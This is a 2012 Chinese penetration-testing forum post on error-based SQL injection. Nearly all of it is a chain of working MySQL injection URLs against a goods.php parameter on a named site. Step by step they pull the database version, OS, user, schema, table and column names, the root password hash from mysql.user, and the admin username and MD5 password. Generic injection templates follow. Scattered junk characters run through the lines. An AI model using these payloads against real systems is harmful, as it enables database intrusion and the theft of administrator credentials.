找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2274|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号 ! }. l* u+ {' s( g5 m1 t: i3 h& u: \- C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) ?3 T8 p3 i( D5 Q, M$ W
8 k9 T5 ~& Z* h( Y0 w3 A判断系统
2 ]$ J6 V, d( D5 A" v0 V1 K8 _' G/ Q; ~& V, \0 j" U
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% A1 l: x+ S" V  H
5 s3 P2 V2 d/ W  f! {
( h5 F  E- x+ l, E0 w, }6 y* U

2 g+ J- X9 A) _3 W& [当前 user()# z0 A' U% I  w5 o. e

/ _4 |, S" g8 n/ z1 ]* thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 n1 @; r* p, _9 ]$ f

) N+ E  O% [+ K1 B( F/ b2 V7 ~) I, d3 H  }

% O: U$ e2 ?$ w$ l) V4 g* v当前 database()
) M. }4 K8 l( l1 o0 p7 jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( U' f) q( _" V' S  U1 E
% S  l- K# C8 @- p% q$ f+ I9 o% J8 r( W

3 i2 a% V6 F5 H0 V& G
; B6 P4 S% @" n, ^, S& croot hash
$ y  W' M8 r: i/ M$ j* D( T1 S' o$ ?) J+ E# J. P! D
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 u. M+ j- X4 L; z# p6 x

8 q: w7 ?  B+ e: G( w
/ b$ K7 L& s( F9 p2 g0 \
* ^8 T) `/ [2 L& D当前 数据库表名8 {$ D# Y/ N! d" y0 a: l0 @/ T

( N9 T- g- B1 k3 Uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' f' i" J4 s9 V- ^1 @: n0 E
3 G8 t9 H* T  q0 B$ _  _  z( M# k4 y, T5 B  e4 T) [
0 G7 M. s9 s/ s3 o, v, d" H
当前 数据库 user_name 字段
0 ]7 n4 i& S( N6 J7 Y7 G5 X( [6 Q6 A9 j' u6 {+ q/ G! E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ q7 K3 W- g# e3 o. X& p2 i0 G. x; a. u$ n
当前 数据库 字段 password
' X/ V. j7 g8 V; G% Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 j( C$ ~/ g8 ^) a

. V% }3 n% D' a+ f, N. S* M$ r( C8 K2 x
- j$ q8 o* H3 {: a2 o( C
获得 admin passwd(md5)8 X$ x- f& M5 S4 G

: e1 m+ ~9 S1 j/ u& i( {
. x/ B: U) H7 \0 p, S3 uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# y+ b  \! m2 n: t5 q

# ]7 a- J" ~3 N2 o0 i/ P报错注射
' \; l: l! s4 B/ ]0 w# n8 ^SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
7 i) p# J/ r, Y
" ]) N. p% T% W5 c) ]& dSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
8 a  J$ ?" }# C5 O% V0 b% F4 E, j, m8 [% A" r4 Y
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表